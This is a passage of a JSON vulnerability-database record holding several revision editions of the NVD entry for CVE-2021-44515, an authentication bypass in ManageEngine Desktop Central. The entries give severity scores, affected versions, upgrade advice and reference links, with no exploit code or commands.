"baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T01:25:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T00:55:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T01:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 33}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T01:25:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T01:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T01:25:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 34}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T01:55:34", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T01:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T01:55:34", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 35}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T01:56:15", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T01:56:15"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T01:56:15", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 36}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T02:08:23", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T01:56:15"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", 